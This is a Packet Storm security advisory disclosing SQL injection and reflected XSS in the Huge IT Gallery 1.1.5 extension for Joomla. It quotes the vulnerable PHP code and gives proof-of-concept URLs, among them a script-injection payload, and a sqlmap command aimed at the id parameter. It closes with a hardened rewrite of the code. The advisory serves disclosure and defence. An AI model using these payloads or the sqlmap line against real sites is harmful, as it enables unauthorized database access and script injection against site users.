Packet Storm PACKETSTORM:138027 | Larry W. Cashdollar | Jul 24, 2016

Joomla Huge IT Gallery 1.1.5 Cross Site Scripting / SQL Injection


EPSS: 0.013 (Low), percentile 85.7%

Title: XSS and SQLi in Huge IT Gallery v1.1.5 for Joomla
Author: Larry W. Cashdollar (@_larry0), Elitza Neytcheva (@E1337za)
Date: 2016-07-14  
Download Site: http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-pro  
Vendor: huge-it.com  
Vendor Notified: 2016-07-15, fixed v1.1.6  
Vendor Contact: [email protected]  
Advisory: http://www.vapidlabs.com/advisory.php?v=164  
Description: The extension lets you add multiple images to a gallery, create any number of galleries, attach a description to each of them, and do the same with video links.
Vulnerability:
Both issues hinge on the same request parameter, id, and neither requires being logged in to Joomla. The model concatenates the value unescaped into a SQL WHERE clause, and the view echoes it unescaped into an HTML attribute.

SQL injection via the id parameter: JRequest::getVar('id') applies no integer cast and no SQL quoting, and the value is appended straight after "gallery_id=" in the query below:
./administrator/components/com_gallery/models/gallery.php, lines 51-67:

public function getPropertie() {
    $db = JFactory::getDBO();
    $id_cat = JRequest::getVar('id');
    $query = $db->getQuery(true);
    $query->select('#__huge_itgallery_images.name as name,'
        . '#__huge_itgallery_images.id ,'
        . '#__huge_itgallery_gallerys.name as portName,'
        . 'gallery_id, #__huge_itgallery_images.description as description,image_url,sl_url,sl_type,link_target,#__huge_itgallery_images.ordering,#__huge_itgallery_images.published,published_in_sl_width');
    $query->from(array('#__huge_itgallery_gallerys' => '#__huge_itgallery_gallerys', '#__huge_itgallery_images' => '#__huge_itgallery_images'));
    $query->where('#__huge_itgallery_gallerys.id = gallery_id')->where('gallery_id=' . $id_cat);
    $query->order('ordering desc');

    $db->setQuery($query);
    $results = $db->loadObjectList();
    return $results;
}
  
Reflected XSS: the same id value is echoed raw into an href attribute. Grepping the install for "echo $_GET" turns up exactly one hit:
  
root@Joomla:/var/www/html# find . -name "*.php" -exec grep -l "echo \$_GET" {} \;  
./administrator/components/com_gallery/views/gallery/tmpl/default.php  
root@Joomla:/var/www/html# find . -name "*.php" -exec grep -n "echo \$_GET" {} \;  
256: <a class="modal" rel="{handler: 'iframe', size: {x: 800, y: 500}}" href="index.php?option=com_gallery&view=video&tmpl=component&pid=<?php echo $_GET['id']; ?>" title="Image" >  
CVE: CVE-2016-1000113
Exploit Code:  
XSS PoC (the leading "1-- " keeps the model's WHERE clause valid, since MySQL treats "-- " as a comment, so the page still renders; the "> then closes the href attribute and the script tag lands in the page):
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E
  
SQLi PoC (replace the placeholder with the payload; it is appended verbatim after "gallery_id=" in the WHERE clause, so no quote is needed to break out):
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=SQLiHERE

Same parameter on the site front end:
http://192.168.0.125/index.php?option=com_gallery&id=HERE
  
Video by 'Exploiter':  
https://www.youtube.com/watch?v=U67iQ3-xcho  
  
sqlmap against the administrator path (the * marks the injection point for sqlmap; --load-cookies replays the cookies saved in cookies.txt):
$ sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=*" --dbms mysql
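
Fix (added example, not code from the advisory or from the vendor's 1.1.6 release, which this page does not reproduce): a hardened rewrite of getPropertie() that reads id through Joomla's INT filter and casts it again at the point of use, so the WHERE clause can only ever compare an integer. It assumes the Joomla 2.5/3.x core APIs (JFactory, JInput, JDatabaseQuery, JModelLegacy) and a class name of GalleryModelGallery derived from the file path; the table and column names are the ones in the excerpt above.

```php
<?php
/**
 * Hardened rewrite of the vulnerable model method. Added example, not the
 * vendor's 1.1.6 patch. Assumes Joomla 2.5/3.x core APIs (JFactory, JInput,
 * JDatabaseQuery, JModelLegacy); the class name is assumed from the file path
 * administrator/components/com_gallery/models/gallery.php, the table and
 * column names are the ones in the advisory's excerpt.
 */
defined('_JEXEC') or die;

class GalleryModelGallery extends JModelLegacy
{
    public function getPropertie()
    {
        $db = JFactory::getDbo();

        // Read `id` through the INT filter instead of JRequest::getVar():
        // anything that is not a digit string collapses to 0, so quotes,
        // comment sequences and UNION clauses never reach the query.
        // (JRequest::getInt('id') is the legacy spelling of the same call.)
        $id_cat = JFactory::getApplication()->input->getInt('id', 0);

        if ($id_cat <= 0)
        {
            // No usable gallery id: skip the query instead of running it
            // against a bogus key.
            return array();
        }

        $query = $db->getQuery(true)
            ->select(array(
                $db->quoteName('#__huge_itgallery_images.name', 'name'),
                $db->quoteName('#__huge_itgallery_images.id'),
                $db->quoteName('#__huge_itgallery_gallerys.name', 'portName'),
                $db->quoteName('gallery_id'),
                $db->quoteName('#__huge_itgallery_images.description', 'description'),
                $db->quoteName('image_url'),
                $db->quoteName('sl_url'),
                $db->quoteName('sl_type'),
                $db->quoteName('link_target'),
                $db->quoteName('#__huge_itgallery_images.ordering'),
                $db->quoteName('#__huge_itgallery_images.published'),
                $db->quoteName('published_in_sl_width'),
            ))
            ->from($db->quoteName('#__huge_itgallery_gallerys'))
            // Explicit join in place of the original comma-separated FROM plus
            // WHERE equality; same rows, clearer intent.
            ->join(
                'INNER',
                $db->quoteName('#__huge_itgallery_images')
                . ' ON ' . $db->quoteName('#__huge_itgallery_gallerys.id')
                . ' = ' . $db->quoteName('gallery_id')
            )
            // The (int) cast duplicates getInt() on purpose: if someone later
            // swaps the input call back to getVar(), this clause still cannot
            // carry anything but an integer.
            ->where($db->quoteName('gallery_id') . ' = ' . (int) $id_cat)
            ->order($db->quoteName('ordering') . ' DESC');

        $db->setQuery($query);

        return $db->loadObjectList();
    }
}
```

The template line at default.php:256 gets the same treatment: pid is numeric, so `pid=<?php echo (int) JFactory::getApplication()->input->getInt('id'); ?>` removes the reflection outright. Where a value has to remain a string, build the URL first and echo `htmlspecialchars($url, ENT_QUOTES, 'UTF-8')` into the href attribute; ENT_QUOTES matters because the attribute is double-quoted and the PoC above breaks out of it with a double quote.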